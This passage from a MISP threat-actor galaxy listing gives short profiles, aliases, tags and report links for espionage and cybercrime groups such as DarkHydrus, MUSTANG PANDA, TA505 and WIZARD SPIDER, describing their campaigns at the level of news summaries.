https://unit42.paloaltonetworks.com/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/

https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/

https://attack.mitre.org/groups/G0078/

https://unit42.paloaltonetworks.com/atoms/pastygemini/

DarkHydrus

In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy).

The tag is: misp-galaxy:threat-actor="DarkHydrus"

DarkHydrus is also known as:

  • LazyMeerkat

  • G0079

  • Obscure Serpens

Table 11924. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

https://mobile.twitter.com/360TIC/status/1083289987339042817

https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/

https://unit42.paloaltonetworks.com/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/

https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/

https://attack.mitre.org/groups/G0079/

https://unit42.paloaltonetworks.com/atoms/obscureserpens/

RedAlpha

Recorded Future’s Insikt Group has identified two new cyberespionage campaigns targeting the Tibetan Community over the past two years. The campaigns, which we are collectively naming RedAlpha, combine light reconnaissance, selective targeting, and diverse malicious tooling. We discovered this activity as the result of pivoting off of a new malware sample observed targeting the Tibetan community based in India.

The tag is: misp-galaxy:threat-actor="RedAlpha"

RedAlpha is also known as:

  • DeepCliff

  • Red Dev 3

Table 11925. Table References

Links

https://www.recordedfuture.com/chinese-cyberespionage-operations

https://go.recordedfuture.com/hubfs/reports/cta-2018-0626.pdf

https://go.recordedfuture.com/hubfs/reports/ta-2022-0816.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

TempTick

This threat actor targets organizations in the finance, defense, aerospace, technology, health-care, and automotive sectors and media organizations in East Asia for the purpose of espionage. Believed to be responsible for the targeting of South Korean actors prior to the meeting of Donald J. Trump and Kim Jong-un

The tag is: misp-galaxy:threat-actor="TempTick"

Table 11926. Table References

Links

https://www.cfr.org/interactive/cyber-operations/temptick

Operation Parliament

This threat actor uses spear-phishing techniques to target parliaments, government ministries, academics, and media organizations, primarily in the Middle East, for the purpose of espionage. Based on our findings, we believe the attackers represent a previously unknown geopolitically motivated threat actor. The campaign started in 2017, with the attackers doing just enough to achieve their goals. They most likely have access to additional tools when needed and appear to have access to an elaborate database of contacts in sensitive organizations and personnel worldwide, especially of vulnerable and non-trained staff. The victim systems range from personal desktop or laptop systems to large servers with domain controller roles or similar. The nature of the targeted ministries varied, including those responsible for telecommunications, health, energy, justice, finance and so on. Operation Parliament appears to be another symptom of escalating tensions in the Middle East region. The attackers have taken great care to stay under the radar, imitating another attack group in the region. They have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their command and control servers. The targeting seems to have slowed down since the beginning of 2018, probably winding down when the desired data or access was obtained. The targeting of specific victims is unlike previously seen behavior in regional campaigns by Gaza Cybergang or Desert Falcons and points to an elaborate information-gathering exercise that was carried out before the attacks (physical and/or digital). With deception and false flags increasingly being employed by threat actors, attribution is a hard and complicated task that requires solid evidence, especially in complex regions such as the Middle East.

The tag is: misp-galaxy:threat-actor="Operation Parliament"

Table 11927. Table References

Links

https://www.cfr.org/interactive/cyber-operations/operation-parliament

https://securelist.com/operation-parliament-who-is-doing-what/85237/

https://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html

Inception Framework

This threat actor uses spear-phishing techniques to target private-sector energy, defense, aerospace, research, and media organizations and embassies in Africa, Europe, and the Middle East, for the purpose of espionage.

The tag is: misp-galaxy:threat-actor="Inception Framework"

Inception Framework is also known as:

  • Clean Ursa

  • Cloud Atlas

  • OXYGEN

  • G0100

  • ATK116

  • Blue Odin

Table 11928. Table References

Links

https://www.cfr.org/interactive/cyber-operations/inception-framework

https://web.archive.org/web/20160710180729/https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Inception_APT_Analysis_Bluecoat.pdf

https://logrhythm.com/blog/catching-the-inception-framework-phishing-attack

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/bcs_wp_InceptionReport_EN_v12914.pdf

https://securelist.com/the-red-october-campaign/57647

https://securelist.com/red-october-diplomatic-cyber-attacks-investigation/36740

https://securelist.com/red-october-part-two-the-modules/57645

https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083

https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899

https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability

https://securelist.com/recent-cloud-atlas-activity/92016

https://www.symantec.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies

https://www.akamai.com/uk/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://unit42.paloaltonetworks.com/atoms/clean-ursa

https://www.cfr.org/interactive/cyber-operations/cloud-atlas

https://www.cfr.org/cyber-operations/red-october

https://attack.mitre.org/groups/G0100

HenBox

This threat actor targets Uighurs—a minority ethnic group located primarily in northwestern China—and devices from Chinese mobile phone manufacturer Xiaomi, for espionage purposes.

The tag is: misp-galaxy:threat-actor="HenBox"

Table 11929. Table References

Links

https://www.cfr.org/interactive/cyber-operations/henbox

MUSTANG PANDA

This threat actor targets nongovernmental organizations using Mongolian-themed lures for espionage purposes. In April 2017, CrowdStrike Falcon Intelligence observed a previously unattributed actor group with a Chinese nexus targeting a U.S.-based think tank. Further analysis revealed a wider campaign with unique tactics, techniques, and procedures (TTPs). This adversary targets non-governmental organizations (NGOs) in general, but uses Mongolian language decoys and themes, suggesting this actor has a specific focus on gathering intelligence on Mongolia. These campaigns involve the use of shared malware like Poison Ivy or PlugX. Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files.

The tag is: misp-galaxy:threat-actor="MUSTANG PANDA"

MUSTANG PANDA is also known as:

  • BRONZE PRESIDENT

  • HoneyMyte

  • Red Lich

  • TEMP.HEX

  • BASIN

  • Earth Preta

  • TA416

  • Stately Taurus

  • LuminousMoth

Table 11930. Table References

Links

https://www.cfr.org/interactive/cyber-operations/mustang-panda

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.secureworks.com/research/threat-profiles/bronze-president

https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html

https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader

https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european

https://unit42.paloaltonetworks.com/stately-taurus-targets-philippines-government-cyberespionage/

Thrip

This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.

The tag is: misp-galaxy:threat-actor="Thrip"

Thrip is also known as:

  • G0076

  • ATK78

Table 11931. Table References

Links

https://www.cfr.org/interactive/cyber-operations/thrip

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

https://attack.mitre.org/groups/G0076/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://cyberthreat.thalesgroup.com/sites/default/files/2022-05/THALES%20THREAT%20HANDBOOK%202022%20Light%20Version_1.pdf

Stealth Mango and Tangelo

This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.

The tag is: misp-galaxy:threat-actor=" Stealth Mango and Tangelo "

Table 11932. Table References

Links

https://www.cfr.org/interactive/cyber-operations/stealth-mango-and-tangelo

https://www.lookout.com/blog/stealth-mango

PowerPool

Malware developers have started to use the zero-day exploit for Task Scheduler component in Windows, two days after proof-of-concept code for the vulnerability appeared online.

A security researcher who uses the online name SandboxEscaper on August 27 released the source code for exploiting a security bug in the Advanced Local Procedure Call (ALPC) interface used by Windows Task Scheduler.

More specifically, the problem is with the SchRpcSetSecurity API function, which fails to properly check user’s permissions, allowing write privileges on files in C:\Windows\Task.

The vulnerability affects Windows versions 7 through 10 and can be used by an attacker to escalate their privileges to all-access SYSTEM account level.

A couple of days after the exploit code became available (source and binary), malware researchers at ESET noticed its use in active malicious campaigns from a threat actor they call PowerPool, because of their tendency to use tools mostly written in PowerShell for lateral movement.

The group appears to have a small number of victims in the following countries: Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States, and Ukraine.

The researchers say that PowerPool developers did not use the binary version of the exploit, deciding instead to make some subtle changes to the source code before recompiling it.

The tag is: misp-galaxy:threat-actor="PowerPool"

PowerPool is also known as:

  • IAmTheKing

Table 11933. Table References

Links

https://www.bleepingcomputer.com/news/security/windows-task-scheduler-zero-day-exploited-by-malware/

https://twitter.com/craiu/status/1311920398259367942

Bahamut

Bahamut is a threat actor primarily operating in Middle East and Central Asia, suspected to be a private contractor to several state sponsored actors. They were observed conduct phishing as well as desktop and mobile malware campaigns.

The tag is: misp-galaxy:threat-actor="Bahamut"

Table 11934. Table References

Links

https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/

https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/

Iron Group

Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.

The tag is: misp-galaxy:threat-actor="Iron Group"

Iron Group is also known as:

  • Iron Cyber Group

Table 11935. Table References

Links

https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/

Operation BugDrop

This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations.

The tag is: misp-galaxy:threat-actor="Operation BugDrop"

Table 11936. Table References

Links

https://www.cfr.org/interactive/cyber-operations/operation-bugdrop

Unnamed Actor

This threat actor compromises civil society groups the Chinese Communist Party views as hostile to its interests, such as Tibetan, Uyghur, Hong Kong, and Taiwanese activist. The threat actor also targeted the Myanmar electoral commission.

The tag is: misp-galaxy:threat-actor="Unnamed Actor"

Table 11937. Table References

Links

https://www.cfr.org/interactive/cyber-operations/unnamed-actor

Domestic Kitten

An extensive surveillance operation targets specific groups of individuals with malicious mobile apps that collect sensitive information on the device along with surrounding voice recordings. Researchers with CheckPoint discovered the attack and named it Domestic Kitten. The targets are Kurdish and Turkish natives, and ISIS supporters, all Iranian citizens.

The tag is: misp-galaxy:threat-actor="Domestic Kitten"

Domestic Kitten is also known as:

  • Bouncing Golf

  • APT-C-50

Table 11939. Table References

Links

https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/

https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html

https://www.welivesecurity.com/2022/10/20/domestic-kitten-campaign-spying-iranian-citizens-furball-malware/

https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/

FASTCash

Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.

The tag is: misp-galaxy:threat-actor="FASTCash"

Roaming Mantis

According to new research by Kaspersky’s GReAT team, the online criminal activities of the Roaming Mantis Group have continued to evolve since they were first discovered in April 2018. As part of their activities, this group hacks into exploitable routers and changes their DNS configuration. This allows the attackers to redirect the router user’s traffic to malicious Android apps disguised as Facebook and Chrome or to Apple phishing pages that were used to steal Apple ID credentials. Recently, Kaspersky has discovered that this group is testing a new monetization scheme by redirecting iOS users to pages that contain the Coinhive in-browser mining script rather than the normal Apple phishing page. When users are redirected to these pages, they will be shown a blank page in the browser, but their CPU utilization will jump to 90% or higher.

The tag is: misp-galaxy:threat-actor="Roaming Mantis"

Roaming Mantis is also known as:

  • Roaming Mantis Group

Table 11940. Table References

Links

https://www.bleepingcomputer.com/news/security/roaming-mantis-group-testing-coinhive-miner-redirects-on-iphones/

GreyEnergy

ESET research reveals a successor to the infamous BlackEnergy APT group targeting critical infrastructure, quite possibly in preparation for damaging attacks

The tag is: misp-galaxy:threat-actor="GreyEnergy"

GreyEnergy has relationships with:

  • similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"

Table 11941. Table References

Links

https://www.eset.com/int/greyenergy-exposed/

https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/

The Shadow Brokers

The Shadow Brokers (TSB) is a hacker group who first appeared in the summer of 2016. They published several leaks containing hacking tools from the National Security Agency (NSA, including several zero-day exploits.[1] Specifically, these exploits and vulnerabilities targeted enterprise firewalls, antivirus software, and Microsoft products. The Shadow Brokers originally attributed the leaks to the Equation Group threat actor, who have been tied to the NSA’s Tailored Access Operations unit.

The tag is: misp-galaxy:threat-actor="The Shadow Brokers"

The Shadow Brokers is also known as:

  • The ShadowBrokers

  • TSB

  • Shadow Brokers

  • ShadowBrokers

Table 11942. Table References

Links

https://en.wikipedia.org/wiki/The_Shadow_Brokers

https://securelist.com/darkpulsar/88199/

https://musalbas.com/blog/2016/08/16/equation-group-firewall-operations-catalogue.html

https://www.vice.com/en_us/article/53djj3/shadow-brokers-whine-that-nobody-is-buying-their-hacked-nsa-files

https://www.scmagazineuk.com/second-shadow-brokers-dump-released/article/1476023

https://www.cyberscoop.com/nsa-shadow-brokers-leaks-iran-russia-optimusprime-stoicsurgeon/

https://www.csoonline.com/article/3190055/new-nsa-leak-may-expose-its-bank-spying-windows-exploits.html

https://threatpost.com/shadowbrokers-dump-more-equation-group-hacks-auction-file-password/124882/

http://securityaffairs.co/wordpress/62770/hacking/shadowbrokers-return.html

https://www.hackread.com/nsa-data-dump-shadowbrokers-expose-unitedrake-malware/

https://blacklakesecurity.com/who-was-the-nsa-contractor-arrested-for-leaking-the-shadow-brokers-hacking-tools/

EvilTraffic

Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.

The tag is: misp-galaxy:threat-actor="EvilTraffic"

EvilTraffic is also known as:

  • Operation EvilTraffic

Table 11943. Table References

Links

http://securityaffairs.co/wordpress/68059/cyber-crime/eviltraffic-malvertising-campaign.html

https://cybaze.it/download/zlab/20180121_CSE_Massive_Malvertising_Report.pdf

HookAds

HookAds is a malvertising campaign that purchases cheap ad space on low quality ad networks commonly used by adult web sites, online games, or blackhat seo sites. These ads will include JavaScript that redirects a visitor through a serious of decoy sites that look like pages filled with native advertisements, online games, or other low quality pages. Under the right circumstances, a visitor will silently load the Fallout exploit kit, which will try and install its malware payload.

The tag is: misp-galaxy:threat-actor="HookAds"

Table 11944. Table References

Links

https://www.bleepingcomputer.com/news/security/hookads-malvertising-installing-malware-via-the-fallout-exploit-kit/

INDRIK SPIDER

INDRIK SPIDER is a sophisticated eCrime group that has been operating Dridex since June 2014. In 2015 and 2016, Dridex was one of the most prolific eCrime banking trojans on the market and, since 2014, those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits. Throughout its years of operation, Dridex has received multiple updates with new modules developed and new anti-analysis features added to the malware. In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.

The tag is: misp-galaxy:threat-actor="INDRIK SPIDER"

INDRIK SPIDER has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Manatee Tempest" with estimative-language:likelihood-probability="likely"

Table 11945. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

DNSpionage

Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it’s clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuous as possible during their attacks. Based on this actor’s infrastructure and TTPs, we haven’t been able to connect them with any other campaign or actor that’s been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers. In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let’s Encrypt certificates for the redirected domains. These certificates provide X.509 certificates for TLS free of charge to the user. We don’t know at this time if the DNS redirections were successful. In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.

The tag is: misp-galaxy:threat-actor="DNSpionage"

DNSpionage is also known as:

  • COBALT EDGEWATER

Table 11946. Table References

Links

https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html

https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/

https://krebsonsecurity.com/tag/dnspionage/

https://www.secureworks.com/research/threat-profiles/cobalt-edgewater

DarkVishnya

Dubbed DarkVishnya, the attacks targeted at least eight banks using readily-available gear such as netbooks or inexpensive laptops, Raspberry Pi mini-computers, or a Bash Bunny - a USB-sized piece hardware for penetration testing purposes that can pose as a keyboard, flash storage, network adapter, or as any serial device.

The tag is: misp-galaxy:threat-actor="DarkVishnya"

Table 11947. Table References

Links

https://www.bleepingcomputer.com/news/security/netbooks-rpis-and-bash-bunny-gear-attacking-banks-from-the-inside/

Operation Poison Needles

What’s noteworthy is that according to the introduction on the compromised website of the polyclinic (http://www.p2f.ru), the institution was established in 1965 and it was founded by the Presidential Administration of Russia. The multidisciplinary outpatient institution mainly serves the civil servants of the highest executive, legislative, judicial authorities of the Russian Federation, as well as famous figures of science and art. Since it is the first detection of this APT attack by 360 Security on a global scale, we code-named it as “Operation Poison Needles”, considering that the target was a medical institution. Currently, the attribution of the attacker is still under investigation. However, the special background of the polyclinic and the sensitiveness of the group it served both indicate the attack is highly targeted. Simultaneously, the attack occurred at a very sensitive timing of the Kerch Strait Incident, so it also aroused the assumption on the political attribution of the attack.

The tag is: misp-galaxy:threat-actor="Operation Poison Needles"

Table 11948. Table References

Links

http://blogs.360.cn/post/PoisonNeedles_CVE-2018-15982_EN

GC01

From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).

The tag is: misp-galaxy:threat-actor="GC01"

GC01 is also known as:

  • Golden Chickens

  • Golden Chickens01

  • Golden Chickens 01

GC01 has relationships with:

  • similar: misp-galaxy:threat-actor="GC02" with estimative-language:likelihood-probability="likely"

Table 11949. Table References

Links

https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

GC02

From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).

The tag is: misp-galaxy:threat-actor="GC02"

GC02 is also known as:

  • Golden Chickens

  • Golden Chickens02

  • Golden Chickens 02

GC02 has relationships with:

  • similar: misp-galaxy:threat-actor="GC01" with estimative-language:likelihood-probability="likely"

Table 11950. Table References

Links

https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

Operation Sharpshooter

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries. Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

The tag is: misp-galaxy:threat-actor="Operation Sharpshooter"

Operation Sharpshooter has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

Table 11951. Table References

Links

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/

https://www.bleepingcomputer.com/news/security/op-sharpshooter-connected-to-north-koreas-lazarus-group/

TA505

TA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind the infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns via Necurs botnet. Other malware associated with TA505 include Philadelphia and GlobeImposter ransomware families.

The tag is: misp-galaxy:threat-actor="TA505"

TA505 is also known as:

  • SectorJ04

  • SectorJ04 Group

  • GRACEFUL SPIDER

  • GOLD TAHOE

  • Dudear

  • G0092

  • ATK103

  • Hive0065

  • CHIMBORAZO

  • Spandex Tempest

TA505 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Lace Tempest" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Spandex Tempest" with estimative-language:likelihood-probability="likely"

Table 11952. Table References

Links

https://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/

https://www.proofpoint.com/sites/default/files/ta505_timeline_final4_0.png

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter

https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware

https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf

https://threatpost.com/ta505-servhelper-malware/140792/

https://blog.yoroi.company/research/the-stealthy-email-stealer-in-the-ta505-arsenal/

https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546

https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/

https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic

https://cyberthreat.thalesgroup.com/attackers/ATK103

https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain

GRIM SPIDER

GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past. Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD. Grim Spider is reportedly associated with Lunar Spider and Wizard Spider.

The tag is: misp-galaxy:threat-actor="GRIM SPIDER"

GRIM SPIDER is also known as:

  • GOLD ULRICK

Table 11953. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

WIZARD SPIDER

Wizard Spider is reportedly associated with Grim Spider and Lunar Spider. The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware. This group represents a growing criminal enterprise of which GRIM SPIDER appears to be a subset. The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot (aka IcedID), which was first observed in April 2017. The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud, through the use of webinjects and a malware distribution function. GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.

The tag is: misp-galaxy:threat-actor="WIZARD SPIDER"

WIZARD SPIDER is also known as:

  • TEMP.MixMaster

  • GOLD BLACKBURN

  • FIN12

  • Periwinkle Tempest

  • DEV-0193

  • Storm-0193

  • Trickbot LLC

  • UNC2053

  • Pistachio Tempest

  • DEV-0237

WIZARD SPIDER has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Periwinkle Tempest" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Pistachio Tempest" with estimative-language:likelihood-probability="likely"

Table 11954. Table References

Links

https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/

https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/

https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/

https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://www.secureworks.com/research/threat-profiles/gold-ulrick

https://www.secureworks.com/research/dyre-banking-trojan

https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic

https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users

http://www.secureworks.com/research/threat-profiles/gold-blackburn

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf

https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

MUMMY SPIDER

